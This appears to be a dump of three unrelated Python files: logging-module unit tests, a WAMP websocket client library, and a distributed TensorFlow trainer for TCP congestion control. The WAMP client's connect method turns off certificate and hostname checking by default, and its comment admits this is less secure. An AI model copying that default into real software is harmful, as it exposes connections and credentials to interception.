return self.tcpserver.log_output
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEquals(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = tempfile.mktemp(".log")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn)
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn)
try:
self.failUnlessEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = u'\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
stream = cStringIO.StringIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, '\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
logging.captureWarnings(True)
warnings.filterwarnings("always", category=UserWarning)
try:
file = cStringIO.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = cStringIO.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42, file,
"Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s, "dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
warnings.resetwarnings()
logging.captureWarnings(False)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest)
if __name__ == "__main__":
test_main()
|
__init__.py | from __future__ import unicode_literals
import re
import io
import json
import time
import threading
import six
import ssl
from six.moves import queue
import socket
import websocket
from .messages import *
from .utils import logger
from .exceptions import *
STATE_DISCONNECTED = 0
STATE_CONNECTING = 1
STATE_WEBSOCKET_CONNECTED = 3
STATE_AUTHENTICATING = 4
STATE_CONNECTED = 2
REGISTERED_CALL_URI = 0
REGISTERED_CALL_CALLBACK = 1
SUBSCRIPTION_TOPIC = 0
SUBSCRIPTION_CALLBACK = 1
class WAMPConnectionError(Exception):
"""
"""
class WampInvokeWrapper(threading.Thread):
""" Used to put invoke requests on a separate thread
so we can make WAMP requests while in a WAMP request
"""
def __init__(self,client,handler,message):
super(WampInvokeWrapper,self).__init__()
self.client = client
self.handler = handler
self.message = message
def run(self):
message = self.message
req_id = message.request_id
try:
result = self.handler(
message,
*(message.args),
**(message.kwargs)
)
self.client.send_message(YIELD(
request_id = req_id,
options={},
args=[result]
))
except Exception as ex:
error_uri = self.client.get_full_uri('error.invoke.failure')
exargs = ["Call failed: {}".format(ex)]
try:
json.dumps(ex.args) # Just testing
exargs += list(ex.args)
except TypeError as err:
logger.warning("Unable to serialize exception arguments: {}".format(ex))
try:
self.client.send_message(ERROR(
request_code = WAMP_INVOCATION,
request_id = req_id,
details = {},
error = error_uri,
args = exargs
))
# We might fail when we try to send an error message back to the
# server (should we have disconnected)
except Exception as ex:
logger.error("ERROR attempting to send error message: {}".format(ex))
class WampSubscriptionWrapper(threading.Thread):
""" Used to put invoke requests on a separate thread
so we can make WAMP requests while in a WAMP request
"""
def __init__(self,client,handler,event):
super(WampSubscriptionWrapper,self).__init__()
self.client = client
self.handler = handler
self.event = event
def run(self):
event = self.event
self.handler(
event,
*(event.args),
**(event.kwargs)
)
class WAMPClient(threading.Thread):
ws = None
url = None
uri_base = None
realm = None
agent = None
authid = None
authmethods = None
timeout = None
sslopt = None
sockopt = None
loop_timeout = 5
heartbeat_timeout = 10
ping_interval = 3
auto_reconnect = True
session_id = None
peer = None
_subscriptions = None
_registered_calls = None
_request_loop_notify_restart = None
_requests_pending = None
_request_disconnect = None
_request_shutdown = False
_state = STATE_DISCONNECTED
_last_ping_time = None
_last_pong_time = None
_heartbeat_thread = None
_stop_heartbeat = False
def __init__(
self,
url='ws://localhost:8080',
realm='realm1',
agent='python-swampyer-1.0',
uri_base='',
authmethods=None,
authid=None,
timeout=10,
loop_timeout=5,
heartbeat_timeout=10,
ping_interval=3,
auto_reconnect=1,
sslopt=None,
sockopt=None,
):
self._state = STATE_DISCONNECTED
super(WAMPClient,self).__init__()
self.daemon = True
self._request_loop_notify_restart = threading.Condition()
if auto_reconnect == True:
auto_reconnect = 1
self.configure(
url = url,
uri_base = uri_base,
realm = realm,
agent = agent,
timeout = timeout,
authid = authid,
authmethods = authmethods,
auto_reconnect = auto_reconnect,
sslopt = sslopt,
sockopt = sockopt,
loop_timeout = loop_timeout,
heartbeat_timeout = heartbeat_timeout,
ping_interval = ping_interval
)
def get_full_uri(self,uri):
""" Returns the full URI with prefix attached
"""
if self.uri_base:
return self.uri_base + '.' + uri
return uri
def connect(self,soft_reset=False,**options):
""" This just creates the websocket connection
"""
self._state = STATE_CONNECTING
logger.debug("About to connect to {}".format(self.url))
m = re.search('(ws+)://([\w\.]+)(:?:(\d+))?',self.url)
options['subprotocols'] = ['wamp.2.json']
# Handle the weird issue in websocket that the origin
# port will be always http://host:port even though connection is
# wss. This causes some origin issues with demo.crossbar.io demo
# so we ensure we use http or https appropriately depending on the
# ws or wss protocol
if m and m.group(1).lower() == 'wss':
origin_port = ':'+m.group(4) if m.group(4) else ''
options['origin'] = 'https://{}{}'.format(m.group(2),origin_port)
# Attempt connection once unless it's autoreconnect in which
# case we try and try again...
while True:
try:
if self.sslopt:
options.setdefault('sslopt',self.sslopt)
# By default if no settings are chosen we apply
# the looser traditional policy (makes life less
# secure but less excruciating on windows)
if options.get("sslopt") is None:
options["sslopt"] = {
"cert_reqs":ssl.CERT_NONE,
"check_hostname": False
}
if self.sockopt:
options.setdefault('sockopt',self.sockopt)
self.ws = websocket.WebSocket(fire_cont_frame=options.pop("fire_cont_frame", False),
skip_utf8_validation=options.pop("skip_utf8_validation", False),
enable_multithread=True,
**options)
self.ws.settimeout(self.loop_timeout)
self.ws.connect(self.url, **options)
self.handle_connect()
except Exception as ex:
if self.auto_reconnect:
logger.debug(
"Error connecting to {url}. Reconnection attempt in {retry} second(s). {err}".format(
url=self.url,
retry=self.auto_reconnect,
err=ex
)
)
time.sleep(self.auto_reconnect)
continue
else:
raise
break
logger.debug("Connected to {}".format(self.url))
if not soft_reset:
self._subscriptions = {}
self._registered_calls = {}
self._requests_pending = {}
self._state = STATE_WEBSOCKET_CONNECTED
# notify the threading.Conditional that restart can happen
self._request_loop_notify_restart.acquire()
self._request_loop_notify_restart.notify()
self._request_loop_notify_restart.release()
def start_heartbeat(self, event):
self._last_ping_time = None
self._last_pong_time = None
while not event.wait(self.ping_interval) and not self._stop_heartbeat:
self._last_ping_time = time.time()
try:
self.ws.ping(str(self._last_ping_time))
except Exception as ex:
raise WAMPConnectionError("Ping failed: %s", ex)
self._stop_heartbeat = False
def stop_heartbeat(self):
self._stop_heartbeat = True
def heartbeat(self):
""" starts a new thread that sends websocket ping messages to
the router.
"""
self._stop_heartbeat = False
if self.ping_interval:
event = threading.Event()
thread = threading.Thread(
target=self.start_heartbeat, args=(event,))
thread.setDaemon(True)
thread.start()
self.heartbeat_thread = thread
def is_disconnected(self):
""" returns a true value if the connection is currently dead
"""
return ( self._state == STATE_DISCONNECTED )
def is_connected(self):
""" returns a true value if the connection is currently active
"""
return ( self._state == STATE_CONNECTED )
def configure(self, **kwargs):
for k in ('url','uri_base','realm',
'agent','timeout','authmethods', 'authid',
'auto_reconnect', 'sslopt', 'sockopt',
'loop_timeout', 'heartbeat_timeout', 'ping_interval'):
if k in kwargs:
setattr(self,k,kwargs[k])
def handle_challenge(self,data):
""" Executed when the server requests additional
authentication
"""
raise NotImplemented("Received Challenge but authentication not possible. Need to subclass 'handle_challenge'?")
def handle_connect(self):
""" When websocket has initially connected
"""
pass
def handle_join(self,details):
# Then rebind all the registrations and callbacks
# if there's a need
if details.details['authmethod'] != 'anonymous':
self.heartbeat()
to_register = self._registered_calls
self._registered_calls = {}
for uri, callback in to_register.values():
self.register(uri,callback)
to_subscribe = self._subscriptions
self._subscriptions = {}
for uri, callback in to_subscribe.values():
self.subscribe(uri,callback)
def handle_leave(self):
pass
def handle_disconnect(self):
pass
def hello(self,details=None):
""" Say hello to the server and wait for the welcome
message before proceeding
"""
self._welcome_queue = queue.Queue()
if details is None:
details = {}
if self.authid:
details.setdefault('authid', self.authid)
details.setdefault('agent', 'swampyer-1.0')
details.setdefault('authmethods', self.authmethods or ['anonymous'])
details.setdefault('roles', {
'subscriber': {},
'publisher': {},
'caller': {},
'callee': {},
})
self._state = STATE_AUTHENTICATING
self.send_message(HELLO(
realm = self.realm,
details = details
))
# Wait till we get a welcome message
try:
message = self._welcome_queue.get(block=True,timeout=self.timeout)
except Exception as ex:
raise ExWelcomeTimeout("Timed out waiting for WELCOME response")
if message == WAMP_ABORT:
raise ExAbort("Received abort when trying to connect: {}".format(
message.details.get('message',
message.reason)))
self.session_id = message.session_id
self.peer = message
self._state = STATE_CONNECTED
# And hook register/subscribe to anything that's required
self.handle_join(message)
def call(self, uri, *args, **kwargs ):
""" Sends a RPC request to the WAMP server
"""
if self._state == STATE_DISCONNECTED:
raise WAMPConnectionError("WAMP is currently disconnected!")
options = {
'disclose_me': True
}
uri = self.get_full_uri(uri)
message = self.send_and_await_response(CALL(
options=options,
procedure=uri,
args=args,
kwargs=kwargs
))
if message == WAMP_RESULT:
return message.args[0]
if message == WAMP_ERROR:
if message.args:
err = message.args
else:
err = [message.error]
raise ExInvocationError(*err)
return message
def send_message(self,message):
""" Send awamp message to the server. We don't wait
for a response here. Just fire out a message
"""
if self._state == STATE_DISCONNECTED:
raise WAMPConnectionError("WAMP is currently disconnected!")
message = message.as_str()
logger.debug("SND>: {}".format(message))
if not self.ws:
raise WAMPConnectionError("WAMP is currently disconnected!")
try:
self.ws.send(message)
except websocket.WebSocketConnectionClosedException:
raise WAMPConnectionError("WAMP is currently disconnected!")
def send_and_await_response(self,request):
""" Used by most things. Sends out a request then awaits a response
keyed by the request_id
"""
if self._state == STATE_DISCONNECTED:
raise WAMPConnectionError("WAMP is currently disconnected!")
wait_queue = queue.Queue()
request_id = request.request_id
self._requests_pending[request_id] = wait_queue;
self.send_message(request)
try:
res = wait_queue.get(block=True,timeout=self.timeout)
except queue.Empty as ex:
raise Exception("Did not receive a response!")
if isinstance(res, GOODBYE):
raise WAMPConnectionError("WAMP is currently disconnected!")
return res
def dispatch_to_awaiting(self,result):
""" Send dat ato the appropriate queues
"""
# If we are awaiting to login, then we might also get
# an abort message. Handle that here....
if self._state == STATE_AUTHENTICATING:
# If the authentication message is something unexpected,
# we'll just ignore it for now
if result == WAMP_ABORT \
or result == WAMP_WELCOME \
or result == WAMP_GOODBYE:
self._welcome_queue.put(result)
return
try:
request_id = result.request_id
if request_id in self._requests_pending:
self._requests_pending[request_id].put(result)
del self._requests_pending[request_id]
except:
raise Exception("Response does not have a request id. Do not know who to send data to. Data: {} ".format(result.dump()))
def handle_welcome(self, welcome):
""" Hey cool, we were told we can access the server!
"""
self._welcome_queue.put(welcome)
def handle_result(self, result):
""" Dispatch the result back to the appropriate awaiter
"""
self.dispatch_to_awaiting(result)
def handle_goodbye(self, goodbye):
""" Dispatch the result back to the appropriate awaiter
"""
pass
def handle_subscribed(self, result):
""" Handle the successful subscription
"""
self.dispatch_to_awaiting(result)
def handle_registered(self, result):
""" Handle the request registration
"""
self.dispatch_to_awaiting(result)
def handle_error(self, error):
""" OOops! An error occurred
"""
self.dispatch_to_awaiting(error)
def handle_abort(self, reason):
""" We're out?
"""
self._welcome_queue.put(reason)
self.close()
self.disconnect()
def handle_invocation(self, message):
""" Passes the invocation request to the appropriate
callback.
"""
req_id = message.request_id
reg_id = message.registration_id
if reg_id in self._registered_calls:
handler = self._registered_calls[reg_id][REGISTERED_CALL_CALLBACK]
invoke = WampInvokeWrapper(self,handler,message)
invoke.start()
else:
error_uri = self.get_full_uri('error.unknown.uri')
self.send_message(ERROR(
request_code = WAMP_INVOCATION,
request_id = req_id,
details = {},
error =error_uri
))
def handle_event(self, event):
""" Send the event to the subclass or simply reject
"""
subscription_id = event.subscription_id
if subscription_id in self._subscriptions:
# FIXME: [1] should be a constant
handler = self._subscriptions[subscription_id][SUBSCRIPTION_CALLBACK]
WampSubscriptionWrapper(self,handler,event).start()
def handle_unknown(self, message):
""" We don't know what to do with this. So we'll send it
into the queue just in case someone wants to do something
with it but we'll just blackhole it.
"""
self.dispatch_to_awaiting(message)
def subscribe(self,topic,callback=None,options=None):
""" Subscribe to a uri for events from a publisher
"""
full_topic = self.get_full_uri(topic)
result = self.send_and_await_response(SUBSCRIBE(
options=options or {},
topic=full_topic
))
if result == WAMP_SUBSCRIBED:
if not callback:
callback = lambda a: None
self._subscriptions[result.subscription_id] = [topic,callback]
return result
def unsubscribe(self, subscription_id):
""" Unsubscribe an existing subscription
"""
result = self.send_and_await_response(UNSUBSCRIBE(subscription_id=subscription_id))
try:
del self._subscriptions[subscription_id]
except IndexError:
logger.warn("Subscription ID '%s' not found in local subscription list. Sent unsubscribe to router anyway.")
return result
def publish(self,topic,options=None,args=None,kwargs=None):
""" Publishes a messages to the server
"""
topic = self.get_full_uri(topic)
if options is None:
options = {'acknowledge':True}
if options.get('acknowledge'):
request = PUBLISH(
options=options or {},
topic=topic,
args=args or [],
kwargs=kwargs or {}
)
result = self.send_and_await_response(request)
return result
else:
request = PUBLISH(
options=options or {},
topic=topic,
args=args or [],
kwargs=kwargs or {}
)
self.send_message(request)
return None
def disconnect(self):
""" Disconnect from the websocket and pause the process
till we reconnect
"""
logger.debug("Disconnecting")
# Close off the websocket
if self.ws:
try:
if self._state == STATE_CONNECTED:
self.handle_leave()
self.stop_heartbeat()
self.send_message(GOODBYE(
details={},
reason="wamp.error.system_shutdown"
))
logger.debug("Closing Websocket")
try:
self.ws.close()
except Exception as ex:
logger.debug("Could not close websocket connection because: {}".format(ex))
except Exception as ex:
logger.debug("Could not send Goodbye message because {}".format(ex))
pass # FIXME: Maybe do better handling here
self.ws = None
# Cleanup the state variables. By settings this
# we're going to be telling the main loop to stop
# trying to read from a websocket and await a notice
# of restart via a threading.Condition object
self._state = STATE_DISCONNECTED
# Send a message to all queues that we have disconnected
# Without this, any requests that are awaiting a response
# will block until timeout needlessly
for request_id, request_queue in self._requests_pending.items():
request_queue.put(GOODBYE(
details={},
reason="wamp.error.system_shutdown"
))
self._requests_pending = {}
self._last_ping_time = None
self._last_pong_time = None
self.handle_disconnect()
def shutdown(self):
""" Request the system to shutdown the main loop and shutdown the system
This is a one-way trip! Reconnecting requires a new connection
to be made!
"""
self._request_shutdown = True
for i in range(100):
if self._state == STATE_DISCONNECTED:
break
time.sleep(0.1)
def start(self, **options):
""" Initialize websockets, say hello, and start listening for events
"""
self.connect(**options)
if not self.isAlive():
super(WAMPClient,self).start()
self.hello()
return self
def reconnect(self):
""" Attempt to reconnect to the WAMP server. Thia also assumes that
the main loop is still running
"""
# Reset the connection
self.connect(soft_reset=True)
# And hello hello
self.hello()
return self
def register(self,uri,callback,details=None):
full_uri = self.get_full_uri(uri)
result = self.send_and_await_response(REGISTER(
details=details or {},
procedure=full_uri
))
if result == WAMP_REGISTERED:
self._registered_calls[result.registration_id] = [ uri, callback ]
return result
def run(self):
""" Waits and receives messages from the server. This
function somewhat needs to block so is executed in its
own thread until self._request_shutdown is called.
"""
while not self._request_shutdown:
# Find out if we have any data pending from the
# server
try:
if self._last_pong_time:
since_last_pong = time.time() - self._last_pong_time
else:
since_last_pong = None
# If we've been asked to stop running the
# request loop. We'll just sit and wait
# till we get asked to run again
if self._state not in [STATE_AUTHENTICATING,STATE_WEBSOCKET_CONNECTED,STATE_CONNECTED]:
self._request_loop_notify_restart.acquire()
self._request_loop_notify_restart.wait(self.loop_timeout)
self._request_loop_notify_restart.release()
continue
# If we don't have a websocket defined.
# we don't go further either
elif not self.ws:
logger.debug("No longer have a websocket. Marking disconnected")
self._state = STATE_DISCONNECTED
continue
if since_last_pong and since_last_pong > self.heartbeat_timeout:
# If the last ping response happened too long
# ago, consider it a websocket timeout and
# handle disconnect.
raise WAMPConnectionError("Maximum websocket response delay of %s secs exceeded.", self.heartbeat_timeout)
# Okay, we think we're okay so let's try and read some data
opcode, data = self.ws.recv_data(control_frame=True)
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT:
data = data.decode('utf-8')
if opcode == websocket.ABNF.OPCODE_PONG:
duration = time.time() - float(data)
self._last_pong_time = time.time()
data = None
opcode = None
logger.debug('Received websocket ping response in %s seconds', round(duration, 3))
continue
if opcode not in (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY):
continue
except io.BlockingIOError:
continue
except websocket.WebSocketTimeoutException:
continue
except (websocket.WebSocketConnectionClosedException, WAMPConnectionError, socket.error) as ex:
logger.debug("WebSocket Exception. Requesting disconnect:".format(ex))
self._state = STATE_DISCONNECTED
self.stop_heartbeat()
self.disconnect()
# If the server disconnected, let's try and reconnect
# back to the service after a random few seconds
if self.auto_reconnect:
# As doing a reconnect would block and would then
# prevent us from ticking the websoocket, we'll
# go into a subthread to deal with the reconnection
def reconnect():
self.reconnect()
t = threading.Thread(target=reconnect)
t.start()
# FIXME: need to randomly wait
time.sleep(1)
if not data: continue
except Exception as ex:
logger.error("ERROR in main loop: {}".format(ex))
continue
try:
logger.debug("<RCV: {}".format(data))
message = WampMessage.loads(data)
logger.debug("<RCV: {}".format(message.dump()))
try:
code_name = message.code_name.lower()
handler_name = "handle_"+code_name
handler_function = getattr(self,handler_name)
handler_function(message)
except AttributeError as ex:
self.handle_unknown(message)
except Exception as ex:
logger.error("ERROR in main loop when receiving: {}".format(ex))
class WAMPClientTicket(WAMPClient):
username = None
password = None
def __init__(
self,
password=None,
username=None,
**kwargs
):
if not kwargs.get('authmethods'):
kwargs['authmethods'] = ['ticket']
super(WAMPClientTicket,self).__init__(**kwargs)
self.daemon = True
self.configure(
password = password,
username = username,
**kwargs
)
def configure(self, **kwargs):
# Just alias username to make things "easier"
if 'username' in kwargs:
kwargs.setdefault('authid',kwargs['username'])
super(WAMPClientTicket,self).configure(**kwargs)
for k in ('password',):
if k in kwargs:
setattr(self,k,kwargs[k])
def handle_challenge(self,data):
""" Executed when the server requests additional
authentication
"""
# Send challenge response
self.send_message(AUTHENTICATE(
signature = self.password,
extra = {}
))
|
d5.py | '''
MIT License
Copyright (c) Chen-Yu Yen - Soheil Abbasloo 2020
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import threading
import logging
import tensorflow as tf
import sys
from agent import Agent
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import argparse
import gym
import numpy as np
import time
import random
import datetime
import sysv_ipc
import signal
import pickle
from utils import logger, Params
from envwrapper import Env_Wrapper, TCP_Env_Wrapper, GYM_Env_Wrapper
def create_input_op_shape(obs, tensor):
input_shape = [x or -1 for x in tensor.shape.as_list()]
return np.reshape(obs, input_shape)
def evaluate_TCP(env, agent, epoch, summary_writer, params, s0_rec_buffer, eval_step_counter):
score_list = []
eval_times = 1
eval_length = params.dict['max_eps_steps']
start_time = time.time()
for _ in range(eval_times):
step_counter = 0
ep_r = 0.0
if not params.dict['use_TCP']:
s0 = env.reset()
if params.dict['recurrent']:
a = agent.get_action(s0_rec_buffer, False)
else:
a = agent.get_action(s0, False)
a = a[0][0]
env.write_action(a)
while True:
eval_step_counter += 1
step_counter += 1
s1, r, terminal, error_code = env.step(a, eval_=True)
if error_code == True:
s1_rec_buffer = np.concatenate( (s0_rec_buffer[params.dict['state_dim']:], s1) )
if params.dict['recurrent']:
a1 = agent.get_action(s1_rec_buffer, False)
else:
a1 = agent.get_action(s1, False)
a1 = a1[0][0]
env.write_action(a1)
else:
print("Invalid state received...\n")
env.write_action(a)
continue
ep_r = ep_r+r
if (step_counter+1) % params.dict['tb_interval'] == 0:
modified_action = env.map_action(a)
alpha = modified_action[0]
beta = modified_action[1]
summary = tf.summary.Summary()
summary.value.add(tag='Eval/Step/0-Alpha', simple_value=alpha)
summary.value.add(tag='Eval/Step/0-Beta', simple_value=beta)
summary.value.add(tag='Eval/Step/2-Reward', simple_value=r)
summary_writer.add_summary(summary, eval_step_counter)
s0 = s1
a = a1
if params.dict['recurrent']:
s0_rec_buffer = s1_rec_buffer
if step_counter == eval_length or terminal:
score_list.append(ep_r)
break
summary = tf.summary.Summary()
summary.value.add(tag='Eval/Return', simple_value=np.mean(score_list))
summary_writer.add_summary(summary, epoch)
return eval_step_counter
class learner_killer():
def __init__(self, buffer):
self.replay_buf = buffer
print("learner register sigterm")
signal.signal(signal.SIGTERM, self.handler_term)
print("test length:", self.replay_buf.length_buf)
def handler_term(self, signum, frame):
if not config.eval:
with open(os.path.join(params.dict['train_dir'], "replay_memory.pkl"), "wb") as fp:
pickle.dump(self.replay_buf, fp)
print("test length:", self.replay_buf.length_buf)
print("--------------------------Learner: Saving rp memory--------------------------")
print("-----------------------Learner's killed---------------------")
sys.exit(0)
def main():
tf.get_logger().setLevel(logging.ERROR)
parser = argparse.ArgumentParser()
parser.add_argument('--load', action='store_true', default=False, help='default is %(default)s')
parser.add_argument('--eval', action='store_true', default=False, help='default is %(default)s')
parser.add_argument('--tb_interval', type=int, default=1)
parser.add_argument('--train_dir', type=str, default=None)
parser.add_argument('--mem_r', type=int, default = 123456)
parser.add_argument('--mem_w', type=int, default = 12345)
parser.add_argument('--base_path',type=str, required=True)
parser.add_argument('--job_name', type=str, choices=['learner', 'actor'], required=True, help='Job name: either {\'learner\', actor}')
parser.add_argument('--task', type=int, required=True, help='Task id')
## parameters from parser
global config
global params
config = parser.parse_args()
## parameters from file
params = Params(os.path.join(config.base_path,'params.json'))
if params.dict['single_actor_eval']:
local_job_device = ''
shared_job_device = ''
def is_actor_fn(i): return True
global_variable_device = '/cpu'
is_learner = False
server = tf.train.Server.create_local_server()
filters = []
else:
local_job_device = '/job:%s/task:%d' % (config.job_name, config.task)
shared_job_device = '/job:learner/task:0'
is_learner = config.job_name == 'learner'
global_variable_device = shared_job_device + '/cpu'
def is_actor_fn(i): return config.job_name == 'actor' and i == config.task
if params.dict['remote']:
cluster = tf.train.ClusterSpec({
'actor': params.dict['actor_ip'][:params.dict['num_actors']],
'learner': [params.dict['learner_ip']]
})
else:
cluster = tf.train.ClusterSpec({
'actor': ['localhost:%d' % (8001 + i) for i in range(params.dict['num_actors'])],
'learner': ['localhost:8000']
})
server = tf.train.Server(cluster, job_name=config.job_name,
task_index=config.task)
filters = [shared_job_device, local_job_device]
if params.dict['use_TCP']:
env_str = "TCP"
env_peek = TCP_Env_Wrapper(env_str, params,use_normalizer=params.dict['use_normalizer'])
else:
env_str = 'YourEnvironment'
env_peek = Env_Wrapper(env_str)
s_dim, a_dim = env_peek.get_dims_info()
action_scale, action_range = env_peek.get_action_info()
if not params.dict['use_TCP']:
params.dict['state_dim'] = s_dim
if params.dict['recurrent']:
s_dim = s_dim * params.dict['rec_dim']
if params.dict['use_hard_target'] == True:
params.dict['tau'] = 1.0
with tf.Graph().as_default(),\
tf.device(local_job_device + '/cpu'):
tf.set_random_seed(1234)
random.seed(1234)
np.random.seed(1234)
actor_op = []
now = datetime.datetime.now()
tfeventdir = os.path.join( config.base_path, params.dict['logdir'], config.job_name+str(config.task) )
params.dict['train_dir'] = tfeventdir
if not os.path.exists(tfeventdir):
os.makedirs(tfeventdir)
summary_writer = tf.summary.FileWriterCache.get(tfeventdir)
with tf.device(shared_job_device):
agent = Agent(s_dim, a_dim, batch_size=params.dict['batch_size'], summary=summary_writer,h1_shape=params.dict['h1_shape'],
h2_shape=params.dict['h2_shape'],stddev=params.dict['stddev'],mem_size=params.dict['memsize'],gamma=params.dict['gamma'],
lr_c=params.dict['lr_c'],lr_a=params.dict['lr_a'],tau=params.dict['tau'],PER=params.dict['PER'],CDQ=params.dict['CDQ'],
LOSS_TYPE=params.dict['LOSS_TYPE'],noise_type=params.dict['noise_type'],noise_exp=params.dict['noise_exp'])
dtypes = [tf.float32, tf.float32, tf.float32, tf.float32, tf.float32]
shapes = [[s_dim], [a_dim], [1], [s_dim], [1]]
queue = tf.FIFOQueue(10000, dtypes, shapes, shared_name="rp_buf")
if is_learner:
with tf.device(params.dict['device']):
agent.build_learn()
agent.create_tf_summary()
if config.load is True and config.eval==False:
if os.path.isfile(os.path.join(params.dict['train_dir'], "replay_memory.pkl")):
with open(os.path.join(params.dict['train_dir'], "replay_memory.pkl"), 'rb') as fp:
replay_memory = pickle.load(fp)
_killsignal = learner_killer(agent.rp_buffer)
for i in range(params.dict['num_actors']):
if is_actor_fn(i):
if params.dict['use_TCP']:
shrmem_r = sysv_ipc.SharedMemory(config.mem_r)
shrmem_w = sysv_ipc.SharedMemory(config.mem_w)
env = TCP_Env_Wrapper(env_str, params, config=config, for_init_only=False, shrmem_r=shrmem_r, shrmem_w=shrmem_w,use_normalizer=params.dict['use_normalizer'])
else:
env = GYM_Env_Wrapper(env_str, params)
a_s0 = tf.placeholder(tf.float32, shape=[s_dim], name='a_s0')
a_action = tf.placeholder(tf.float32, shape=[a_dim], name='a_action')
a_reward = tf.placeholder(tf.float32, shape=[1], name='a_reward')
a_s1 = tf.placeholder(tf.float32, shape=[s_dim], name='a_s1')
a_terminal = tf.placeholder(tf.float32, shape=[1], name='a_terminal')
a_buf = [a_s0, a_action, a_reward, a_s1, a_terminal]
with tf.device(shared_job_device):
actor_op.append(queue.enqueue(a_buf))
if is_learner:
Dequeue_Length = params.dict['dequeue_length']
dequeue = queue.dequeue_many(Dequeue_Length)
queuesize_op = queue.size()
if params.dict['ckptdir'] is not None:
params.dict['ckptdir'] = os.path.join( config.base_path, params.dict['ckptdir'])
print("## checkpoint dir:", params.dict['ckptdir'])
isckpt = os.path.isfile(os.path.join(params.dict['ckptdir'], 'checkpoint') )
print("## checkpoint exists?:", isckpt)
if isckpt== False:
print("\n# # # # # # Warning ! ! ! No checkpoint is loaded, use random model! ! ! # # # # # #\n")
else:
params.dict['ckptdir'] = tfeventdir
tfconfig = tf.ConfigProto(allow_soft_placement=True)
if params.dict['single_actor_eval']:
mon_sess = tf.train.SingularMonitoredSession(
checkpoint_dir=params.dict['ckptdir'])
else:
mon_sess = tf.train.MonitoredTrainingSession(master=server.target,
save_checkpoint_secs=15,
save_summaries_secs=None,
save_summaries_steps=None,
is_chief=is_learner,
checkpoint_dir=params.dict['ckptdir'],
config=tfconfig,
hooks=None)
agent.assign_sess(mon_sess)
if is_learner:
if config.eval is True:
print("=========================Learner is up===================")
while not mon_sess.should_stop():
time.sleep(1)
continue
if config.load is False:
agent.init_target()
counter = 0
start = time.time()
